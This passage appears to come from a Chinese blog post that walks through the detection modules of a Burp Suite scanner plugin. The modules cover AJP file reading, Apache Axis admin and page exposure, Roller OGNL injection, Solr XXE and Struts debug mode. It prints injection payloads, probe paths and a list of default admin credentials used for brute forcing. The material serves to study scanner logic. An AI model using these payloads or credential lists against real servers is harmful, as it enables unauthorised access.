  <p>然后根据ajp返回的rsp去匹配(包含关系):<br> 也就是根绝我们读取的WEBINF_PATHS的内容。</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING <span class="token operator">=</span> <span class="token string">"<web-app"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>如果存在则说明存在文件读取漏洞。</p> 
  <h4>【2】AJPDetector</h4> 
  <p>This module detects Apache JServ Protocol (AJP) services<br> 实际上就是检测有没有开启的AJP</p> 
  <p>fuzz的port列表</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">int</span><span class="token punctuation">[</span><span class="token punctuation">]</span> AJP13PORTS <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token number">8080</span><span class="token punctuation">,</span> <span class="token number">8102</span><span class="token punctuation">,</span> <span class="token number">8081</span><span class="token punctuation">,</span> <span class="token number">6800</span><span class="token punctuation">,</span> <span class="token number">6802</span><span class="token punctuation">,</span> <span class="token number">8009</span><span class="token punctuation">,</span> <span class="token number">8109</span><span class="token punctuation">,</span> <span class="token number">8209</span><span class="token punctuation">,</span> <span class="token number">8309</span><span class="token punctuation">,</span> <span class="token number">8888</span><span class="token punctuation">,</span> <span class="token number">9999</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
</code></pre> 
  <p>建立socket连接,发送心跳包,判断返回包</p> 
  <pre><code class="prism language-java">            <span class="token class-name">String</span> system <span class="token operator">=</span> host<span class="token punctuation">.</span><span class="token function">concat</span><span class="token punctuation">(</span><span class="token class-name">Integer</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span>port<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token class-name">CPing</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">{</span>
                    <span class="token punctuation">(</span><span class="token keyword">byte</span><span class="token punctuation">)</span> <span class="token number">0x12</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">byte</span><span class="token punctuation">)</span> <span class="token number">0x34</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">byte</span><span class="token punctuation">)</span> <span class="token number">0x00</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">byte</span><span class="token punctuation">)</span> <span class="token number">0x01</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">byte</span><span class="token punctuation">)</span> <span class="token number">0x0a</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
                     <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token class-name">CPong</span> <span class="token operator">!=</span> <span class="token keyword">null</span> <span class="token operator">&&</span> <span class="token function">getHex</span><span class="token punctuation">(</span><span class="token class-name">CPong</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">equalsIgnoreCase</span><span class="token punctuation">(</span><span class="token string">"414200010900000000"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>

</code></pre> 
  <p>这个应该是可以和【1】结合,这里如果判断有心跳包,就直接测试文件包含。</p> 
  <h4>【3】ApacheAxis</h4> 
  <h5>【3】HAPPY_AXIS_PATHS(Axis测试页面泄露)</h5> 
  <p>先遍历PATH</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> HAPPY_AXIS_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/dswsbobje/happyaxis.jsp"</span><span class="token punctuation">,</span> <span class="token comment">// SAP BusinessObjects path</span>
            <span class="token string">"/dswsbobje//happyaxis.jsp"</span><span class="token punctuation">,</span> <span class="token comment">// SAP BusinessObjects path</span>
            <span class="token string">"/jboss-net/happyaxis.jsp"</span><span class="token punctuation">,</span> <span class="token comment">// JBoss</span>
            <span class="token string">"/jboss-net//happyaxis.jsp"</span><span class="token punctuation">,</span> <span class="token comment">// JBoss</span>
            <span class="token string">"/happyaxis.jsp"</span><span class="token punctuation">,</span>
            <span class="token string">"/axis2/axis2-web/HappyAxis.jsp"</span><span class="token punctuation">,</span>
            <span class="token string">"/axis2-web//HappyAxis.jsp"</span><span class="token punctuation">,</span>
            <span class="token string">"/axis//happyaxis.jsp"</span><span class="token punctuation">,</span>
            <span class="token string">"/axis2//axis2-web/HappyAxis.jsp"</span><span class="token punctuation">,</span>
            <span class="token string">"/wssgs/happyaxis.jsp"</span><span class="token punctuation">,</span> <span class="token comment">//JBuilder Apache Axis Admin Console</span>
            <span class="token string">"/tresearch/happyaxis.jsp"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>然后根据返回包match</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_HAPPY_AXIS <span class="token operator">=</span> <span class="token string">"Happiness Page"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h5>【4】AXIS_PATHS(Axis管理后台泄露)</h5> 
  <p>遍历</p> 
  <pre><code class="prism language-java"><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> AXIS_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/axis2/"</span><span class="token punctuation">,</span>
            <span class="token string">"/axis/"</span><span class="token punctuation">,</span>
            <span class="token string">"/dswsbobje/"</span><span class="token punctuation">,</span> <span class="token comment">// SAP BusinessObjects path</span>
            <span class="token string">"/jboss-net/"</span><span class="token punctuation">,</span> <span class="token comment">// JBoss</span>
            <span class="token string">"/tomcat/axis/"</span><span class="token punctuation">,</span>
            <span class="token string">"/wssgs/"</span><span class="token punctuation">,</span> <span class="token comment">//<h1>JBuilder Apache Axis Admin Console</h1> ..<title>Apache-Axis
            "/tresearch/", // JBuilder Apache Axis Admin Console
            "/"
    );

这些根目录加上admin目录请求

private static final String AXIS_ADMIN_PATH = "/axis2-admin/";

如果match到

    private static final byte[] GREP_STRING_AXIS_ADMIN = "Login to Axis2 :: Administration"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>则找到管理后台</p> 
  <h5>【5】weakpassword(Axis管理后台弱口令)</h5> 
  <p>如果找到后台,还可以进行账号密码爆破<br> 常见的密码</p> 
  <pre><code class="prism language-java">        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"jboss"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"both"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"both"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"manager"</span><span class="token punctuation">,</span> <span class="token string">"manager"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"manager"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"role1"</span><span class="token punctuation">,</span> <span class="token string">"role1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"role1"</span><span class="token punctuation">,</span> <span class="token string">"tomcat"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"role"</span><span class="token punctuation">,</span> <span class="token string">"changethis"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"changethis"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"tomcat"</span><span class="token punctuation">,</span> <span class="token string">"changethis"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"j5Brn9"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// Sun Solaris       </span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"admin"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"root"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"1234"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"axis2"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"test"</span><span class="token punctuation">,</span> <span class="token string">"test"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"monitor"</span><span class="token punctuation">,</span> <span class="token string">"monitor"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"guest"</span><span class="token punctuation">,</span> <span class="token string">"guest"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"root"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"admin"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"root"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic01"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"welcome1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"admin"</span><span class="token punctuation">,</span> <span class="token string">"security"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"oracle"</span><span class="token punctuation">,</span> <span class="token string">"oracle"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"system"</span><span class="token punctuation">,</span> <span class="token string">"security"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"system"</span><span class="token punctuation">,</span> <span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"wlcsystem"</span><span class="token punctuation">,</span> <span class="token string">"wlcsystem"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"wlpisystem"</span><span class="token punctuation">,</span> <span class="token string">"wlpisystem"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        
        <span class="token comment">// Orbeon forms</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"orbeonadmin"</span><span class="token punctuation">,</span> <span class="token string">"xforms"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>再加上一个</p> 
  <pre><code class="prism language-java">    listOfPwd<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token string">"axis2"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>用户名就是爆破的admin</p> 
  <p>如果match到</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_AXIS_ADMIN_WEAK_PWD <span class="token operator">=</span> <span class="token string">"You are now logged into the Axis2 administration console"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>则认为是爆破成功</p> 
  <h5>【6】AXIS_SERVICES_PATHS(Axis测试页面泄露)</h5> 
  <p>和上面的AXIS_PATHS拼接</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> AXIS_SERVICES_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/services/listServices"</span><span class="token punctuation">,</span>
            <span class="token string">"/services/"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>如果match到</p> 
  <pre><code class="prism language-java">   <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS_AXIS_SERVICE_PAGE <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"<title>Axis2: Services".getBytes(),
            "List Services".getBytes()
    );

则认为获取到了Service列表

【7】ApacheRollerOGNLInjection(表达式注入)-CVE-2013-4212

表达式注入

String EL_INJECTION_TEST = String.format("${%d*%d}", firstInt, secondInt);

攻击入口是登录页 url存在

if (curURL.getPath().contains("login.rol"))

去除所有参数

for (IParameter param : parameters) {
                rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
            }

新增攻击参数

rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                    callbacks.getHelpers().buildParameter("pageTitle", EL_INJECTION_TEST, IParameter.PARAM_URL)
            );

如果从返回包中Match到上面的计算结果,则认为表达式注入成功。

【8】ApacheSolrXXE - CVE-2017-12629

payload

String xxesolr = "{!xmlparser v=''}";

%s用burp自带的dnslog接口

        IBurpCollaboratorClientContext collaboratorContext = callbacks.createBurpCollaboratorClientContext();
        String currentCollaboratorPayload = collaboratorContext.generatePayload(true);

发送请求

byte[] checkRequest = insertionPoint.buildRequest(xxePayload.getBytes());
IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), checkRequest);

match就看dns结果啦

【9】ApacheStrutsDebugMode(debug页面泄露)

先判断URL是不是java
很粗,前面文章已经讲过了。

List notJ2EETechs = new ArrayList<>();
        notJ2EETechs.add("php");
        notJ2EETechs.add("asp");
        notJ2EETechs.add("cgi");
        notJ2EETechs.add("pl");

        return (!notJ2EETechs.contains(curExtension));

老样子
去除所有入参

//Remove URI parameters
        for (IParameter param : parameters) {
            rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
        }

新增参数,debug=console

rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                callbacks.getHelpers().buildParameter("debug", "console", IParameter.PARAM_URL)
        );

如果返回包match

private static final byte[] GREP_STRING = "'OGNL Console'".getBytes();

则存在漏洞,表达式注入。
看着像后门
